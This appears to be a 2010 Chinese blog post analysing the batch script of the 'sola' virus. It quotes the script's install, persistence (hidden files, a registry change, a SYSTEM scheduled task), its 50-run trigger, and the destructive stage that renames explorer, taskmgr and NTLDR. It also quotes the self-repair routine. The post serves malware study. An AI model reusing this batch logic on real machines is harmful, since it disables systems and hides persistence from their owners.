首页 运维 网络学院 查看内容

sola病毒的一点小认识

2010-5-20 15:23 645 0

摘要:     我是小虫     我手里其实没有sola样本,同学U盘专杀用后,获取了里面的sola.bat    ...
关键词: nbsp sola systemroot Function RunTime Tasks setup dll vbs regedit

    我是小虫     我手里其实没有sola样本,同学U盘专杀用后,获取了里面的sola.bat     由于没收集到vbs,exe文件未观察到,不做评论     下面看下sola的批处理     其实这段批处理主要分为了     安装,运行,测试,恶意程序启用,自删除修复,我们看看宅男的经典部分     下面是对各个分部的判断     f “%1”==“-Install” goto Install     if “%1”==“-Run” goto Run     if “%1”==“-Tenbatsu” goto Tenbatsu     if “%1”==“-Kill” goto Kill     if “%1”==“-Killself” goto Killself     很可惜的是批处理有对电脑系统恶意的vbs,由于不是自己电脑获取,vbs没被收集到     copy %setup%\Function.dll %sola%\Function.dll     attrib %sola%\Function.dll +s +h +r     rar -m0 -ep -ep1 a %setup%\docpack.dll %sola%\Function.dll     rar -m0 -ep -ep1 a %setup%\txtpack.dll %sola%\Function.dll     rar -m0 -ep -ep1 a %setup%\exepack.dll %sola%\Function.dll     rar -m0 -ep -ep1 a %setup%\jpgpack.dll %sola%\Function.dll     del Function.exe     从这里可以看出doc.txt.exe.jpg文件都会被感染,和function.dll整合后然后自我删除Function.exe     安装sleep %A0001% %setup%\sleep.exe %systemroot%\system32\sleep.exe     %A0001%被定义为copy     安装regedit,并且注册表里的相应内容     %A0003% Windows Registry Editor Version 5.00>%systemroot%\Fonts\HIDESE~1\Regedit.reg     %A0003% [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ShellHWDetection]》%systemroot%\Fonts\HIDESE~1\Regedit.reg     %A0003% “Start”=dword:00000004》%systemroot%\Fonts\HIDESE~1\Regedit.reg     regedit /s %systemroot%\Fonts\HIDESE~1\Regedit.reg     RunTimeChk     if not exist %sola%\RunTime.txt echo !50>%sola%\RunTime.txt     FOR /F “tokens=1 delims=!” %%i in (%sola%\RunTime.txt) do set RunTime=%%i     if /i %RunTime% leq 0 goto Virus     set /a RunTime=%Runtime%-1     echo !%Runtime%>%sola%\RunTime.txt     检查在sola文件夹里是否存在runtime.txt文件,并且读取里面的内容然后进行判断,当运行50则进入到virus分部里,不存在者进行创立     if exist %systemroot%\Fonts\HIDESE~1\NoTasks if not exist “%runroot%\SOLA.VBS” copy “%sola%\SOLA.VBS” “%runroot%\SOLA.VBS”     if not exist %systemroot%\Fonts\HIDESE~1\NoTasks if not exist %Taskroot%\Tasks.job copy %setup%\Tasks.xxx %Taskroot%\Tasks.job&attrib %Taskroot%\Tasks.job +s +h +r&schtasks /change /ru “NT AUTHORITY\SYSTEM”     /tn “Tasks”     还会创立tasks.job。tasks.xxx     对于这几个文件由于没有,不知道具体内容     当运行次数达到50次后,可以看到病毒过程     kill过程     会修改(重命名)任务管理器 Explorer,KillNTLDR,并关闭电脑,然后进入不到系统     最后是自删除,对病毒一个自己修复过程吧     :KillSelf     :StartExplorer     ren %systemroot%\explorer.xxx explorer.exe     start %systemroot%\explorer.exe     :BackNTLDR     attrib %systemdrive%\NTLDR -s -h -r     copy /Y %sola%\NTLDR %systemdrive%\NTLDR     attrib %systemdrive%\NTLDR +s +h +r     :RenTmg     ren %systemroot%\system32\taskmgr.xxx taskmgr.exe     :KillVirus     copy %setup%\KillVirus.txt %sola%\KillVirus.txt     C:     cd\     md ~Install     cd ~Install     rar x -hpkakenhi200601 %setup%\SolaKiller.rar     mshta “javascript:new ActiveXObject(‘WScript.Shell’)。Run(‘C:\\~Install\\Install.bat %%1',0);window.close()”     rd /s /q %setup%     attrib %systemroot%\Tasks\Tasks.job -s -h -r     del %systemroot%\Tasks\Tasks.job     cd “%ALLUSERSPROFILE%\「开始」菜单\程序\启动”     if exist sola.vbs del sola.vbs     if exist tenbatsu.vbs del tenbatsu.vbs     start %systemroot%\system32 otepad.exe %sola%\KillVirus.txt     del %sola%\sola.bat     Exit     这断批处理就是对上面病毒过程的一个逆向操作     对于sola.vbs tenbastsu.vbskillvirus.txt等没找到
声明:文章版权归原作者所有 部分文章转自互联网 如有侵权请联系 [邮箱地址] 删除

路过

雷人

握手

鲜花

鸡蛋

最新评论

返回顶部